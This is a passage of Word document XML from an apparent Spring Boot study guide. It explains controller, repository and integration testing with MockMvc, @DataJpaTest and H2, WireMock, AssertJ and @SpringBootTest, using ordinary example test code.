    <w:p w14:paraId="371D8F42"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You can test the controllers using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MockMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which allows you to simulate HTTP requests and assert the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DADE6"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4F8A5"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WebMvcTest(MyController.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54538C3C"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class MyControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437BFC7" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C4F0F1"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635BF124"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private MockMvc mockMvc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593ED6A1" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABCD58C"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MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19594DC1"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12089C30" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5CA451"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5018B12F"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void testGetMapping() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52385B"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when(myService.getMyEntity(1L)).thenReturn(new MyEntity());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348E490"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mockMvc.perform(get("/api/my-entity/1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E751232"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andExpect(status().isOk())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C47F69C"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andExpect(jsonPath("$.id").value(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC8EA0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35883C55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F6929"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Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F23365"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WebMvcTest: This annotation focuses only on Spring MVC components (controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA79F2"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MockBean: Mocks the MyService bean in the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514DAA1"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MockMvc: Simulates HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1448A7"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get("/api/my-entity/1"): Performs a GET request to the specified URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133F34D"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andExpect(status().isOk()): Asserts that the response status is 200 OK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109B97F"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andExpect(jsonPath("$.id").value(1)): Asserts that the id field in the JSON response is 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E25E2"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5. Test with In-Memory Database (H2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A04CC3"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For testing the repository layer, you can use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory database</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like H2. This allows you to test database interactions without relying on an actual database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD797C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A36B5"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DataJpaTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B17B1F"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class MyRepositoryTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD250A" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3212B3C5"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12875CD1"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private MyRepository myRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E008601" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2521CA87"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6361C1"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void testSaveAndFindEntity() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9F23F"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MyEntity entity = new MyEntity("Test");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF1927"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myRepository.save(entity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34C4D6"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Optional&lt;MyEntity&gt; result = myRepository.findById(entity.getId());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02700D27"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assertTrue(result.isPresent());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5489E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF98C4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538446A2"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lastRenderedPageBreak/>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14968DDF"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DataJpaTest: This annotation configures an in-memory database (H2 by default) and sets up a JPA test environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD4F65"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Autowired: Injects the repository class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BB60C"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assertTrue(result.isPresent()): Asserts that the entity is saved and retrievable from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033DAFB"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6. Testing with Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006482E3"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You can configure different profiles for testing environments, for example, using application-test.properties for unit testing with specific configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDFEAE"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Example of application-test.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D20263C"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spring.datasource.url=jdbc:h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567CFE6"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spring.datasource.driverClassName=org.h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9F6705"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spring.datasource.username=sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50401B0F"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spring.datasource.password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465AEC2F"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7. Assertions in Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923A9D5"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JUnit assertions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AssertJ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more fluent and expressive assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837134A"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Example with JUnit assertions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EBDF97"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assertEquals(expected, actual);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED784D"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assertNotNull(myEntity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CF0A6"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Example with AssertJ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18DF82"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assertThat(myEntity).isNotNull();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43317A"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assertThat(myEntity.getName()).isEqualTo("Test");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDF874"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8. Mocking REST Calls with WireMock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1399A"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If you need to mock external HTTP requests or REST API calls in your tests, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WireMock</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC361"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06133297"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SpringBootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29886FDF"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class MyServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72388D82" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E99A9B6"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810A420"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617546F3" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2FC49F"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296FAA1"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void testExternalAPI() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519B780"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WireMock.stubFor(get(urlEqualTo("/external-api"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A16825"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willReturn(aResponse().withBody("response")));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49250139" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BACC0E0"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String response = myService.callExternalApi();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D700AB3"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assertThat(response).isEqualTo("response");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5726C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20779183"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261613C0"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Best Practices for Unit Testing in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38007954"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Test isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that each test is independent and does not rely on external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B576C"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Mock external dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use @MockBean, Mockito, or WireMock to mock external dependencies such as databases, APIs, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50957DC9"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Test both positive and negative cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure tests cover both expected and unexpected scenarios (e.g., invalid inputs, exceptions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120760AA"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Use profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use specific profiles for testing to separate test configurations from production configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401408AA"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By following these steps and practices, you can effectively write unit tests for your Spring Boot application to ensure reliability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658232EC" w14:textId="7DF12170" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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5FAB4A7">
          <v:rect id="_x0000_i2744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6648C" w14:textId="2C4244D5" w:rsidR="0047308B" w:rsidRPr="00CE4B95" w:rsidRDefault="0047308B" w:rsidP="0047308B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="667" w:name="_Toc196308147"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @SpringBootTest used for?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="667"/>
    </w:p>
    <w:p w14:paraId="0291A589" w14:textId="7CE5B392" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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SpringBootTest is an annotation used in Spring Boot to create an application context for integration tests. It is used to test the complete Spring Boot application context in a test environment, including all the beans, configurations, and components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28883922"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Key Use Cases of @SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04A852"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lastRenderedPageBreak/>
        <w:t>Integration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is commonly used for testing the integration of various components in a Spring Boot application, such as services, repositories, controllers, and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA098A"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Test Entire Application Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to load the entire Spring application context, including all the beans, configurations, and environment properties, to test how the application behaves as a whole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0CAC01"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End-to-End Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For testing the full flow from the controller down to the database or any other integrated system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F7708"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Example of @SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6517D"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SpringBootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0EB40"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class MyServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DAAA0" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3794B1"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B50189B"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private MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC9EAB" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36EFCDFA"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BDD114"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void testServiceMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150ABD44"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String result = myService.someMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B9ABD"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assertEquals("Expected Result", result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C37F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C3A34"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91A232"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408590A"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SpringBootTest: Tells Spring to start the full application context for testing. It mimics a real-world environment and ensures that all beans and configurations are loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CBEA8"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Autowired: Injects the service or component into the test class to be tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B0DB2"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Test: Denotes the method as a test method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A893743"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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19D7C2"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Starts the Spring Boot Application Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It loads the full Spring context, including all the beans configured in the application. This is ideal for integration tests where you need to verify how components work together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13772630"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WebEnvironment Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @SpringBootTest can also start a web server (like Tomcat or Jetty) for integration testing of web components (REST controllers). You can specify how to start the web environment (e.g., RANDOM_PORT for a random available port) using the webEnvironment attribute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00CAE4"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SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0274634D"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class MyControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612259D"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139CB0F"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private TestRestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FD2D1" w14:textId="77777777" w:rsidR="00EF2E21" w:rsidRPr="00F42CDC" w:rsidRDefault="00EF2E21" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B78A00"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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635CEF5"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void testController() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951663E"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ResponseEntity&lt;String&gt; response = restTemplate.getForEntity("/api/test", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CC562D"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assertEquals(HttpStatus.OK, response.getStatusCode());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2412EDA4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053378A2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7A057"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Control Over Context Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can specify custom configurations or profiles when running tests using @SpringBootTest to control how the context is loaded, such as using specific application properties for testing (application-test.properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEFA02"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Pros of Using @SpringBootTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2089CE62"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Comprehensive Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows for integration testing of the entire application, ensuring that components work together as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF4D28"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Simulates Real-World Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It runs the application context as it would in production, so it closely simulates actual runtime behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFE348"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEFC47"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Slower than Unit Tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since @SpringBootTest loads the full application context, it can be slower than more isolated unit tests, so it’s usually not suitable for simple unit tests where you mock dependencies.</w:t>
      </w:r>
    </w:p>
